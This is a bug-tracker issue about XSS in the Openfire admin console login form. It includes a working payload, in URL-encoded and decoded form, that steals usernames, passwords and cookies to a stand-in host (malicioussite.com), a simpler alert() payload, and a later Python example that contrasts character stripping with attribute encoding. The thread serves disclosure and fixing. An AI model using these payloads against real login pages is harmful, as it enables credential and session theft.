
Cross-site scripting attack in the login form

Description

As reported by a community member, there is a cross-site scripting vulnerability in the login page of the admin console. Although it's unlikely to be exploited, it's important to get fixed.

Environment

None

Acceptance Test - Entry

None

Activity

Juan C Calderon
January 18, 2006, 5:15 AM

Hello guys

I'm afraid this issue was not completely fixed. The problem still exists for the "url" parameter, and the fix implementation for the "username" parameter has failed, since an XSS attack without the less-than character, like the following, is still working. The following attack implements a small function to steal admin credentials and send them to a (fictitious) malicious site; it is fully functional:
http://JiveServer:9090/login.jsp?username=%22+onchange%3D%27document.loginForm.onsubmit%3Drobit%3Bfunction+robit%28%29+%7Bvar+image%3Bimage+%3D+new+Image%28%29%3Bimage.src+%3D+%22http%3A%2F%2Fwww.malicioussite.com%2FGet.asp%3FUsuario%3D%22+%2B+loginForm.username.value+%2B+%22%26Password%3D%22+%2B+loginForm.password.value+%2B+%22%26cookies%3D%22+%2B+document.cookie%7D%27+me%3D%22

URL decoded
http://JiveServer:9090/login.jsp?username=" onchange='document.loginForm.onsubmit=robit;function robit() {var image;image = new Image();image.src = "http://www.malicioussite.com/Get.asp?Usuario=" + loginForm.username.value + "&Password=" + loginForm.password.value + "&cookies=" + document.cookie}' me="

Please check the following resource for more information of different possible attacks.
http://ha.ckers.org/xss.html

Regards,
JC

davesan
June 26, 2009, 9:43 PM

I looked around, but I didn't see anything more on this. It appears to be marked "fixed", but the admin console, as of version 3.6.4, is still vulnerable to XSS.

e.g.,
http://../openfire/login.jsp?url=%2Findex.jsp&login=&username=%22%20onclick=%22alert(%27xss%27)&password=

Daryl Herzmann
June 26, 2009, 10:44 PM

reopening.

Guus der Kinderen
January 11, 2010, 3:44 AM

Fixed the XSS on the login screen.

Yehuda Katz
April 19, 2010, 6:09 AM

I am not sure the correct solution is to just strip these characters.
My understanding is that some of the characters that function strips could be valid username characters, and while the likelihood of someone using them is low, I would hate to see functionality in the program arbitrarily broken to fix this bug.

I would contribute a fix, but I am having some trouble getting Eclipse to work, and that is my editor of choice.
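Added illustration of the point raised above (example code, not from this thread and not Openfire's own code): a sanitizer that only strips angle brackets leaves the quote-based payloads from this report intact, whereas HTML-attribute encoding keeps every username character and still prevents the value from escaping the attribute. The template and the two payloads are constructed, following the shape of the URLs quoted in the report.

```python
import html
from html.parser import HTMLParser

# Constructed inputs shaped like the report's payloads: neither contains '<' or '>',
# so a fix that only strips those characters leaves them untouched.
PAYLOADS = [
    '" onclick="alert(\'xss\')',
    '" onchange=\'alert(1)\' me="',
]

# Hypothetical login-form fragment into which the username parameter is reflected.
TEMPLATE = '<input type="text" name="username" value="{value}">'


def strip_angle_brackets(value: str) -> str:
    """Character-stripping fix of the kind criticised above (hypothetical)."""
    return value.replace("<", "").replace(">", "")


def encode_for_attribute(value: str) -> str:
    """Context-aware fix: entity-encode quotes and ampersands for an attribute value."""
    return html.escape(value, quote=True)


class _InputAttrs(HTMLParser):
    """Collects the attributes a browser would see on the rendered <input>."""
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def render(value: str, sanitizer) -> str:
    return TEMPLATE.format(value=sanitizer(value))


def injected_attributes(markup: str) -> list:
    """Attributes on the input beyond the three the template declares (empty = safe)."""
    p = _InputAttrs()
    p.feed(markup)
    return sorted(k for k in p.attrs if k not in {"type", "name", "value"})


def rendered_value(markup: str) -> str:
    """The decoded value attribute, i.e. what the user actually typed survives encoding."""
    p = _InputAttrs()
    p.feed(markup)
    return p.attrs.get("value", "")


if __name__ == "__main__":
    for payload in PAYLOADS:
        for name, fn in (("strip", strip_angle_brackets), ("encode", encode_for_attribute)):
            print(f"{name:6} -> injected attributes: {injected_attributes(render(payload, fn))}")
```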

Assignee

Guus der Kinderen

Reporter

MattM

Labels

None

Expected Effort

None

Ignite Forum URL

None

Components

Fix versions

Affects versions

Priority

Blocker